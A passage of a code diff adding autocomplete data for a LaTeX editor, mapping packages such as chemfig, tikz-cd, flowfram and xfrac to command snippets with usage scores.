'\\mathscr{$1}', + meta: 'eucal-cmd', + score: 0.025302230226027712, + }, + { + caption: '\\mathcal{}', + snippet: '\\mathcal{$1}', + meta: 'eucal-cmd', + score: 0.35084018920966636, + }, + ], + ifluatex: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'ifluatex-cmd', + score: 0.008565354665444157, + }, + ], + chemfig: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'chemfig-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chemfig-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'chemfig-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'chemfig-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'chemfig-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'chemfig-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'chemfig-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'chemfig-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'chemfig-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'chemfig-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'chemfig-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chemfig-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'chemfig-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'chemfig-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'chemfig-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'chemfig-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'chemfig-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'chemfig-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'chemfig-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'chemfig-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'chemfig-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'chemfig-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'chemfig-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'chemfig-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'chemfig-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'chemfig-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'chemfig-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'chemfig-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'chemfig-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'chemfig-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'chemfig-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chemfig-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'chemfig-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'chemfig-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'chemfig-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'chemfig-cmd', + score: 0.2864294797053033, + }, + ], + abstract: [ + { + caption: '\\abstractnamefont', + snippet: '\\abstractnamefont', + meta: 'abstract-cmd', + score: 6.2350576842596716e-6, + }, + ], + 'tikz-cd': [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'tikz-cd-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikz-cd-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tikz-cd-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tikz-cd-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'tikz-cd-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'tikz-cd-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'tikz-cd-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'tikz-cd-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'tikz-cd-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tikz-cd-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'tikz-cd-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikz-cd-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'tikz-cd-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tikz-cd-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tikz-cd-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tikz-cd-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'tikz-cd-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tikz-cd-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tikz-cd-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tikz-cd-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'tikz-cd-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tikz-cd-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tikz-cd-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'tikz-cd-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'tikz-cd-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'tikz-cd-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'tikz-cd-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'tikz-cd-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tikz-cd-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'tikz-cd-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'tikz-cd-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikz-cd-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'tikz-cd-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'tikz-cd-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'tikz-cd-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'tikz-cd-cmd', + score: 0.2864294797053033, + }, + ], + flowfram: [ + { + caption: '\\framebreak', + snippet: '\\framebreak', + meta: 'flowfram-cmd', + score: 0.004019097827091264, + }, + { + caption: '\\newstaticframe{}{}{}{}', + snippet: '\\newstaticframe{$1}{$2}{$3}{$4}', + meta: 'flowfram-cmd', + score: 0.0014762683341407986, + }, + { + caption: '\\newflowframe{}{}{}{}[]', + snippet: '\\newflowframe{$1}{$2}{$3}{$4}[$5]', + meta: 'flowfram-cmd', + score: 0.002952536668281597, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'flowfram-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'flowfram-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'flowfram-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'flowfram-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'flowfram-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'flowfram-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'flowfram-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'flowfram-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'flowfram-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'flowfram-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'flowfram-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'flowfram-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'flowfram-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'flowfram-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'flowfram-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'flowfram-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'flowfram-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'flowfram-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'flowfram-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'flowfram-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'flowfram-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'flowfram-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'flowfram-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'flowfram-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'flowfram-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'flowfram-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'flowfram-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'flowfram-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'flowfram-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'flowfram-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'flowfram-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'flowfram-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'flowfram-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'flowfram-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'flowfram-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'flowfram-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'flowfram-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'flowfram-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'flowfram-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'flowfram-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\afterpage{}', + snippet: '\\afterpage{$1}', + meta: 'flowfram-cmd', + score: 0.0018578070791608345, + }, + { + caption: '\\clearpage', + snippet: '\\clearpage', + meta: 'flowfram-cmd', + score: 0.1789117552185788, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'flowfram-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'flowfram-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'flowfram-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'flowfram-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'flowfram-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'flowfram-cmd', + score: 0.0018957469739775527, + }, + ], + marginnote: [ + { + caption: '\\marginnote{}', + snippet: '\\marginnote{$1}', + meta: 'marginnote-cmd', + score: 0.010285502283803235, + }, + { + caption: '\\marginnote', + snippet: '\\marginnote', + meta: 'marginnote-cmd', + score: 0.010285502283803235, + }, + { + caption: '\\raggedleftmarginnote', + snippet: '\\raggedleftmarginnote', + meta: 'marginnote-cmd', + score: 0.0011268470793267921, + }, + ], + xfrac: [ + { + caption: '\\sfrac{}{}', + snippet: '\\sfrac{$1}{$2}', + meta: 'xfrac-cmd', + score: 0.0030164694688453453, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'xfrac-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'xfrac-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'xfrac-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'xfrac-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xfrac-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'xfrac-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'xfrac-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xfrac-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'xfrac-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'xfrac-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'xfrac-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'xfrac-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'xfrac-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'xfrac-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'xfrac-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'xfrac-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'xfrac-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'xfrac-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'xfrac-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'xfrac-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xfrac-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'xfrac-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'xfrac-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'xfrac-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'xfrac-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'xfrac-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'xfrac-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'xfrac-cmd', + score: 0.0063276692758974925, + }, + ], + shortvrb: [ + { + caption: '\\MakeShortVerb{}', + snippet: '\\MakeShortVerb{$1}', + meta: 'shortvrb-cmd', + score: 0.0002890733176655595, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'shortvrb-cmd', + score: 0.009278344180101056, + }, + ], + animate: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'animate-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'animate-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'animate-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'animate-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'animate-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'animate-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'animate-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'animate-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'animate-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'animate-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'animate-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'animate-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'animate-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'animate-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'animate-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'animate-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'animate-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'animate-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'animate-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'animate-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'animate-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'animate-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'animate-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'animate-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'animate-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'animate-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'animate-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'animate-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'animate-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'animate-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'animate-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'animate-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'animate-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'animate-cmd', + score: 0.008565354665444157, + }, + ], + euscript: [ + { + caption: '\\mathscr{}', + snippet: '\\mathscr{$1}', + meta: 'euscript-cmd', + score: 0.025302230226027712, + }, + { + caption: '\\mathcal{}', + snippet: '\\mathcal{$1}', + meta: 'euscript-cmd', + score: 0.35084018920966636, + }, + ], + hhline: [ + { + caption: '\\hhline{}', + snippet: '\\hhline{$1}', + meta: 'hhline-cmd', + score: 0.0004816338278157677, + }, + ], + subfiles: [ + { + caption: '\\documentclass[]{}', + snippet: '\\documentclass[$1]{$2}', + meta: 'subfiles-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\documentclass{}', + snippet: '\\documentclass{$1}', + meta: 'subfiles-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\subfile{}', + snippet: '\\subfile{$1}', + meta: 'subfiles-cmd', + score: 0.03337062633525651, + }, + { + caption: '\\endverbatim', + snippet: '\\endverbatim', + meta: 'subfiles-cmd', + score: 0.0022216421267780076, + }, + { + caption: '\\verbatim', + snippet: '\\verbatim', + meta: 'subfiles-cmd', + score: 0.0072203369120285256, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'subfiles-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'subfiles-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\par', + snippet: '\\par', + meta: 'subfiles-cmd', + score: 0.413853376001159, + }, + { + caption: '\\verbatiminput{}', + snippet: '\\verbatiminput{$1}', + meta: 'subfiles-cmd', + score: 0.0024547099784948665, + }, + { + caption: '\\verbatiminput', + snippet: '\\verbatiminput', + meta: 'subfiles-cmd', + score: 0.0024547099784948665, + }, + ], + accents: [ + { + caption: '\\underaccent{}{}', + snippet: '\\underaccent{$1}{$2}', + meta: 'accents-cmd', + score: 0.00109513727836357, + }, + ], + theorem: [ + { + caption: '\\theorembodyfont{}', + snippet: '\\theorembodyfont{$1}', + meta: 'theorem-cmd', + score: 0.00047103366488576113, + }, + ], + metalogo: [ + { + caption: '\\XeTeX', + snippet: '\\XeTeX', + meta: 'metalogo-cmd', + score: 0.0010635559050357936, + }, + { + caption: '\\TeX', + snippet: '\\TeX', + meta: 'metalogo-cmd', + score: 0.02873756018238537, + }, + { + caption: '\\TeX{}', + snippet: '\\TeX{$1}', + meta: 'metalogo-cmd', + score: 0.02873756018238537, + }, + { + caption: '\\LaTeX', + snippet: '\\LaTeX', + meta: 'metalogo-cmd', + score: 0.2334089308452787, + }, + { + caption: '\\LaTeX{}', + snippet: '\\LaTeX{$1}', + meta: 'metalogo-cmd', + score: 0.2334089308452787, + }, + { + caption: '\\XeLaTeX', + snippet: '\\XeLaTeX', + meta: 'metalogo-cmd', + score: 0.002009786035379175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'metalogo-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'metalogo-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'metalogo-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'metalogo-cmd', + score: 0.021170869458413965, + }, + { + 